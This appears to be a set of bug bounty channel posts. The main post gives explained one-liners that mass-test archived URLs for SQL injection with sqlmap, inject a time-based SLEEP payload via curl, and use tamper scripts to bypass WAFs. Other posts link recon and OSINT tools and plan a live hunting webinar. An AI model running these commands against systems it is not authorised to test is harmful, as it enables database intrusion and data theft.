Bug bounty Tips

Nothing hits a man harder than realising he's growing older with zero progress in his life.

Read caption 👌👇 🔍 Bug Bounty Recon Tip: One-Liner Commands for SQL Injection 1️⃣ SQLi with sqlmap + waybackurls: » waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}" •• Explanation: -- waybackurls: Fetches URLs from the Wayback Machine. -- grep: Filters URLs with query parameters and specific file types. -- sort -u: Removes duplicates. -- sed: Standardizes query parameters. -- sqlmap: Automates SQL injection testing on filtered URLs. 2️⃣ Time-Based SQLi with waybackurls: » waybackurls http://test[.]com | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt » cat urls.txt | sed 's/=/=(CASE%20WHEN%20(888=888)%20THEN%20SLEEP(5)%20ELSE%20888%20END)/g' | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && time curl "{}"' •• Explanation: -- Similar steps to the first command for fetching and filtering URLs. -- sed: Injects a time-based SQL payload. -- curl: Sends requests to test for time-based SQL injection vulnerabilities. 3️⃣ Bypass WAF: » sqlmap -r req.txt --risk 3 --level 3 --dbs --tamper=space2comment,space2morehash •• Explanation: -- sqlmap: Reads the request from req.txt. -- --risk and --level: Sets the risk and level for SQL injection tests. -- --tamper: Uses tamper scripts to bypass web application firewalls (WAFs). 🚀 Enhance your bug bounty toolkit with these powerful SQL injection commands! Which technique will you try first? "Remember, knowledge is power! 🔍💡 Follow for more bug bounty and ethical hacking tips and tricks, along with informative posts to keep you ahead of the game! #RedTeam #InfoSec #CyberSecurity #EthicalHacking #KaliLinux #CyberSec #HackerLife #PenTesting #CyberThreats #NetworkSecurity #SecurityResearch #BugBounty #CyberAttack #InfoSecCommunity #HackThePlanet #OffensiveSecurity #ThreatHunting #CyberSkills #CyberAwareness #SecurityTesting #DigitalForensics #CyberProtection #sql #injection #testing https://www.instagram.com/p/C-HfLncS8A0/?igsh=MTc4MmM1YmI2Ng==

🐋Awesome Hackers Search Engines🐋 Online tools for search info about: - exploit - vulnerabilities - people - emails - phone numbers - domains - certificates and more. https://github.com/edoardottt/awesome-hacker-search-engines

🦋15 BEST INFOMATION GATHERING TOOLS🦋 • Network Map (nmap) - https://github.com/nmap/nmap •Dracnmap - https://github.com/Screetsec/Dracnmap •Xerosploit - https://github.com/LionSec/xerosploit •RED HAWK (All In One Scanning) - https://github.com/Tuhinshubhra/RED_HAWK •ReconSpider(For All Scaning) - https://github.com/bhavsec/reconspider •IsItDown (Check Website Down/Up) Infoga - Email OSINT - https://github.com/m4ll0k/Infoga •ReconDog - https://github.com/s0md3v/ReconDog •Striker - https://github.com/s0md3v/Striker •SecretFinder (like API & etc) - https://github.com/m4ll0k/SecretFinder •Find Info Using Shodan - https://github.com/m4ll0k/Shodanfy.py •Port Scanner - rang3r - https://github.com/floriankunushevci/rang3r •Breacher - https://github.com/s0md3v/Breacher Posted by @TheGodEye

Okay guys, 93% soo let's schedule a webinar on Friday. I will update with a link and let me know which target We should try

API FUZZING LISTS Out of turn post, a very tasty collection of fuzzing wordlists for the API Description of this list from the author: 744,000+ endpoints 357,000+ object properties 211,000+ object names 127,000+ query parameters 74,000+ parameter values 35,000+ path parameters 8,300+ headers 5,300+ paths 880+ common ports

Answer this poll based on this I will decide

But I will be available only after 8pm

Let's leave that here. Decide a day, and I will try to make a webinar and you guys can also join and let's hunt live on webinar for 1 - 2hrs

A new way to explain things via storytelling let me know your thoughts guys

🕵️‍♂️🔍 Ever wondered how your computer fetches web pages? Let's take a fun trip to the "World Wide Library" and meet Wendy the Librarian! 📚✨ She'll show you how making a request for a book is just like your computer requesting a webpage. Dive into this magical story and discover the secrets of request handling! Swipe through to become a web wizard! 🌐✨ . . . . ✔️ Share It with Your Friends. 🔗 CHECKOUT THE LINK IN BIO 🔥 Don’t miss the HIGHLIGHTS 🤔 Any queries? Don’t hesitate to DM. ❤️ LIKE, COMMENT, SHARE and SAVE the post. 👉 Follow us for more cybersecurity tips and tricks! 🌐 Visit us at www.cipherops.xyz 📲 @cipherops.tech https://www.instagram.com/p/C-ASeR-yRvP/?igsh=MTc4MmM1YmI2Ng==

I am looking for an admin who can post content and intaract anyone is here and anyone already running a channel also eligible. I will make him a admin but have some terms and conditions.